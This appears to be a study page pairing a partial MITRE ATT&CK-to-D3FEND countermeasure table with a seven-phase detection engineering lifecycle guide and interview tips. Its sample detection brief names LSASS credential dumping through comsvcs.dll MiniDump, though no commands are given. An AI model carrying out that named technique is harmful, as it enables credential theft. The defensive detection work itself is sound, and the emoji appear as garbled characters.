D3-NTA Network Traffic Analysis Detect
D3-OTF Outbound Traffic Filtering Isolate
D3-DLPB Data Loss Prevention - Block Isolate
T1490 Inhibit System Recovery
D3-FBA File Backup Authorization Harden
D3-SBA System Backup Authorization Harden
D3-RD Restore Data Restore
T1110 Brute Force
D3-MFA Multi-factor Authentication Harden
D3-AL Account Locking Isolate
D3-UBA User Behavior Analysis Detect
D3-CR Credential Rotation Harden
T1558 Steal/Forge Kerberos Tickets
D3-CH Credential Hardening Harden
D3-CGUARD Credential Guard Harden
D3-CR Credential Rotation (krbtgt) Harden
D3-AAA Authentication Attempt Analysis Detect
T1098 Account Manipulation
D3-UAP User Account Permissions Harden
D3-UBA User Behavior Analysis Detect
D3-UAM User Account Monitoring Detect
T1105 Ingress Tool Transfer
D3-NTA Network Traffic Analysis Detect
D3-FA File Analysis Detect
D3-OTF Outbound Traffic Filtering Isolate
D3-EAL Executable Allowlisting Harden

๐Ÿ”„ Detection Engineering Lifecycle Guide 7 phases

The 7-phase workflow used by mature detection engineering teams. Hypothesis โ†’ Data Availability โ†’ Query Development โ†’ Test & Validate โ†’ Tune & Deploy โ†’ Document & Train โ†’ Maintain & Retire. Walk through this in interviews to demonstrate detection engineering maturity.

The 7-Phase Detection Engineering Lifecycle

A detection isn't done when it's written. Every rule lives through 7 phases โ€” and most of them happen after deployment. This is the workflow used by mature detection engineering teams (Elastic, Datadog, Microsoft, the open-source SigmaHQ project). Use it to drive your own rule development and explain your process in interviews.

1

Hypothesis

"What attacker behavior do I want to detect, and why?"

What you do

  • Pick a specific MITRE ATT&CK technique (e.g., T1003.001 LSASS Memory)
  • Define the threat actor / scenario context (ransomware operator post-foothold? APT pre-credential-theft?)
  • Identify the observable โ€” what would actually appear in logs when this happens?
  • Document the assumptions: what data sources you require, what platforms, what attack stage

Output

A detection brief: "Detect LSASS access via comsvcs.dll MiniDump invocation by non-approved processes"

โš ๏ธ Skipping this phase is the #1 cause of low-quality, high-FP detections. Specificity wins.
2

Data Availability

"Do I have the logs to actually see this?"

What you do

  • Identify required data sources (Sysmon EID 10? Windows Security 4688? PowerShell ScriptBlock 4104?)
  • Verify the logs are being collected, parsed, and ingested (not just turned on at endpoints)
  • Test on a known-good system: trigger the technique safely, confirm the event appears in your SIEM
  • If data is missing, escalate: GPO change, EDR config, log shipping fix BEFORE writing rule

Output

A confirmed evidence chain: technique โ†’ log source โ†’ field availability โ†’ SIEM index

๐Ÿ’ก Use Atomic Red Team to safely generate the events you're targeting in a lab โ€” confirms data presence before you commit.
3

Query Development

"Write the actual detection logic โ€” and write it right."

What you do

  • Write the detection in your portable format first (Sigma) โ€” convert to platform-specific later
  • Start narrow: match the specific behavior, not adjacent broad patterns
  • Use both inclusion (target this) and exclusion (filter known-good) clauses
  • Cite sources in comments: MITRE technique, related threat reports, your hypothesis brief
  • Save the original brief alongside the rule โ€” the "why" is as important as the "what"

Output

A Sigma YAML rule with metadata, MITRE tags, references, and a clear detection block

๐Ÿ“œ Sigma first means your detection survives SIEM migrations. The rule is intellectual property โ€” don't tie it to one vendor.
4

Test & Validate

"Prove it actually fires โ€” and only fires when it should."

What you do

  • Run Atomic Red Team test (or equivalent) for the target technique โ†’ verify rule triggers
  • Run common false-positive scenarios โ†’ verify rule does NOT trigger
  • Test on representative endpoint diversity (workstation vs. server vs. DC vs. dev box)
  • Document the test cases, including specific commands and expected outcomes
  • Quantify: against your data, how many hits per day? Acceptable rate is <5/day for high-fidelity rules.

Output

A test report: which atomics passed/failed, what FPs you encountered, baseline hit rate

๐Ÿงช Untested detections are aspirational, not real. Tested + tuned detections are real.
5

Tune & Deploy

"Reduce noise. Document FPs. Push to production."

What you do

  • Add suppressions for legitimate triggers found in testing (e.g., specific service accounts, software vendors)
  • Document EVERY exclusion with a comment explaining why it's safe
  • Set rule severity, response SLA, and on-call routing in the SIEM
  • Stage deployment: dev โ†’ small canary โ†’ broad production
  • Update the playbook card with current rule version + validated date

Output

A production rule with documented exclusions, ownership, and runbook reference

โš–๏ธ Goal: signal-to-noise ratio > 10:1. Detections that wake up the on-call for false positives 3 times burn out the SOC.
6

Document & Train

"Make the alert actionable for whoever responds."

What you do

  • Write a runbook: what is this alert? what does the analyst do FIRST? FP investigation steps?
  • Link the runbook from the alert itself (Sentinel, Splunk, Elastic all support this)
  • Train the SOC team โ€” walkthrough the detection, the FP patterns, the response steps
  • Add the rule to your central detection library / GitHub repo with the runbook

Output

A runbook in the alert: hypothesis, indicators of compromise, response actions, escalation criteria

๐Ÿ“– An undocumented detection becomes a ticket nobody knows how to handle. Documentation IS the detection.
7

Maintain & Retire

"Detections rot. Plan for the lifecycle end."

What you do

  • Quarterly review: still firing? still relevant? still high-fidelity?
  • Track metrics: hits/week, true positive rate, time-to-tune
  • When attackers change behavior (e.g., they stop using the targeted LOLBin) โ€” update or retire
  • Track CVEs and threat intel that obsolete or revive detections
  • Decommission cleanly: archive the rule, remove from production, update playbook with retirement date

Output

A maintenance log per rule: revision history, performance metrics, retirement decision

โฑ๏ธ Average detection rule shelf-life is 12-18 months before requiring meaningful changes. Plan for it.

๐ŸŽฏ Why This Matters for Your Career

Detection Engineer interviews โ€” especially at mature shops like Mandiant, CrowdStrike, Elastic, Datadog, and the cleared-environment contractors โ€” will ask you to walk through this process. Knowing the phases and being able to articulate "I wrote a Sigma rule for T1003.001, here's how I tested it with Atomic Red Team #1, here's the FP I found and how I tuned it" is the difference between a generalist analyst and a Detection Engineer.

The phases are also a checklist: when you're stuck on a detection problem, find which phase you're in and follow the workflow.